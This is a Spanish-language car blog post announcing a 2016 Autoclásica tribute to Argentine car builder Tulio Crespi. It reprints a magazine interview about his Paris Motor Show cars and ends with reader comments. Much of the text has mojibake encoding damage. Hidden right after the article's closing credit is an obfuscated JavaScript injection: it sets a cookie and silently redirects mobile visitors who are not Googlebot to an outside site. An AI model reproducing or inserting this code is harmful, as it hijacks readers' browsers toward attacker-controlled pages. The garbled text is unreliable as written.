AutoclA?sica 2016: los sport de Crespi

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En el marco de AutoclA?sica 2016, Auto Sport Nacional brindarA? un reconocimiento a Tulio Crespi a mA?s de 40 aA�os de su participaciA?n por primera y A?nica vez en el SalA?n del AutomA?vil de ParA�s como diseA�ador y constructor de automA?viles argentinos, presentando en esa oportunidad una Tulieta GT Convertible y una Tulia GT fabricadas en nuestro paA�s.

ASN estarA? recibiendo en su espacio, la visita del gran Tulio Crespi que ademA?s traerA? desde su fA?brica de Balcarce, especialmente para la ocasiA?n, a la Tulieta GT de su propiedad para ser expuesta en nuestro sector junto con otros tres autos producto de su talento, creatividad y trabajo: una Tulieta GT CoupA� Primera Serie, una Tulieta GT Convertible, y una Tulia GT.

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Creemos que este acontecimiento es un hito A?nico e irrepetible en la historia de la industria automotriz argentina, por eso decidimos festejarlo a lo grande y compartirlo con toda la comunidad de AutoClA?sica, el pA?blico visitante, y la prensa especializada.

Los invitamos este domingo 9 de octubre a las 12:30 hs en el espacio ASN, stand 9 y 10 sobre el boulevard principal, para vivir junto a Tulio la entrega de este reconocimiento.

A?A?Los esperamos!!

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Tulio Crespi y sus fuori serie en Europa.

Bajo el cielo de ParA�s.
Luego de acariciar la idea durante mucho tiempo, Tulio Crespi presentA? sus modelos Tulia y Tulietta en el SalA?n de ParA�s. ReciA�n llegado, nos comenta su A�xito, sorpresas y su intenciA?n de volver a Europa con un equipo de competiciA?n organizado y bien estructurado.

Por primera vez en la historia de los Salones Internacionales del AutomA?vil, un auto argentino -un par de autos, mejor dicho- catalogados como fuera de serie, fueron presentados ante el pA?blico europeo, conocedor y exigente por la sencilla razA?n de tener muy a mano otros autos para comparar.
La vieja idea de Tulio Crespi, finalmente, cristalizA?. El mA?s fA�rtil de los constructores argentinos querA�a mostrar su autos -el Tulietta y el Tulia- pero nunca habA�a podido, hasta ahora, por la mA?s simple de las razones (pesos).
Estuvimos con Tulio, de regreso en su taller de Santos Dumont y Montenegro. Y transcribimos sus palabras en las que falta el A�nfasis entusiasta con que Crespi subrayA? cada uno de sus pA?rrafos:
“… Ya habA�a tenido tres invitaciones previas para participar en el SalA?n de Paris. No pudo ser antes, pero este gusto yo me lo querA�a dar, y decidA� hacerlo luego de mi anterior viaje a Europa. En esa oportunidad me empapA� muy bien sobre todo lo que se refiriera a autos “fuori – serie” y me di cuenta de que mis autos, sin estar a la altura de los mejores (De Tomaso, Ferrari, etcA�tera), no desentonaban de ninguna manera con el resto. Me puse, entonces, en campaA�a y gracias a un amigo que tengo en ParA�s -Jean Paul Gabin- pudimos concretar la obtenciA?n del Stand; nos dieron el que correspondA�a a Lotus, ya que Lotus no se presentA? como empresa en sA� misma sino a travA�s del carrocero que diseA�A? el “Elite”. Resuelto el tema Europa tuvimos que resolver los problemas aquA�. No coordinA?bamos por una cuestiA?n de fechas con ningA?n barco que llegara a tiempo para la exposiciA?n. MoviA�ndonos, nos encontramos con la posibilidad de mandar los dos autos por medio de la Fuerza AA�rea Argentina; asA� que allA? fuimos con un HA�rcules C-130. Buenos Aires, Recife, Canarias… y Paris.
“Nos impresionA? cA?mo llamaba la atenciA?n en su primer contacto con el suelo francA�s; los llevamos andando del aeropuerto al salA?n y por la autopista toda la gente se daba vuelta a mirarnos. A?SabA�s que pasa?. Estos coches no se parecen a ningA?n coche europeo. Son diferentes; no digo mejores ni peores, solamente diferentes. Es mA?s; te podrA�a afirmar que asA� como no se pueden comparar con los fuori serie italianos, surgidos de verdaderos maestros en la materia, si se pueden comparar con los similares ingleses y franceses”.
“A mi me sorprendiA? la reacciA?n de la gente especializada; grandes capos de Ferrari vinieron a ver los autos y se sorprendieron por la escasa tecnologA�a con que cuento para construirlos; me preguntaron de todo, desde la resoluciA?n del chasis hasta el tratamiento que le doy al plA?stico”.
“Este viaje significA? muchA�simo para mA�. Comercialmente, ya tengo un postulante para ser representante de la marca en EspaA�a, y tengo ademA?s unos cuantos pedidos que no puedo satisfacer simplemente porque no tengo stock; estos autos yo los hago por encargo A?nicamente. Hasta un petrolero de Kuwait me encargA? uno, pero lo quiere con caja automA?tica y aire acondicionado. Con los impuestos y todo va a terminar costA?ndole mA?s que un Jaguar, pero el tipo igual quiere el auto…”
“La cosa es que en 12 dA�as de exposiciA?n, un millA?n doscientas mil personas desfilaron por el SalA?n y vieron nuestros autos argentinos expuestos al lado de los mejores del mundo. Toda esta experiencia me costA? algo asA� como 30 millones de pesos, pero que estA?n bien invertidos, no sA?lo comercialmente sino porque la industria argentina estuvo representada por primera vez en un salA?n de esta naturaleza”.
“Lo A?nico que lamento es no haber llevado un monoplaza; allA� habA�a en exposiciA?n autos de FA?rmula Renault y FA?rmula France; te aseguro que con esos autos sA� estoy en un nivel parejo, por lo menos constructivamente”.
“Vuelvo a Europa para el prA?ximo abril, si las gestiones para correr en FA?rmula Renault Europa se concretan. La idea es participar en las 16 carreras que conforman el campeonato, llevando tres chasis y dos pilotos que serA?n A?ngel Guerra y Petete Beamonte. Claro que para este viaje tengo que conseguir bastante apoyo; Renault Argentina ha hizo las gestiones en el sentido de conseguir un par de motores de primera lA�nea. Antonio Fama -un gesto lindA�simo- me ofreciA? una casa rodante… Veremos que A�xito tenemos nosotros con nuestra gestiA?n ante el gobierno; necesitamos 25 dA?lares por persona y por dA�a, para un equipo compuesto por seis personas. Por otra parte, las empresas particulares que puedan apoyarnos, bienvenidas sean; necesitamos de todo; desde herramientas hasta la tabla de cronA?metros…”

Nota originalmenteA�publicada en la Revista Corsa NA? 492 y firmada por el recordado CA�sar Sorkin.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

3 Comentarios, RSS

  1. Beppe viola 09/10/2016 @ 10:45 am

    Cuánto es cierto lo que decía don Crespi…
    En aquel periodo (early ’70’s) Italia era otro planeta, pero la industria Argentina de aquella categoría no estaba lejos de los ingleses (Twr, Morgan) y sobretodo de los franceses (Alpine, Matra)…
    Otra ocasión perdida…

  2. Alvaro 09/10/2016 @ 4:44 pm

    Tulio Crespi es un artista al que no se lo valoró en su justa medida…la Tulieta simepre fué y sigue siendo un diseño muy logrado !!!

  3. Alvaro 09/10/2016 @ 4:45 pm

    Fe de errata: siempre

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1963

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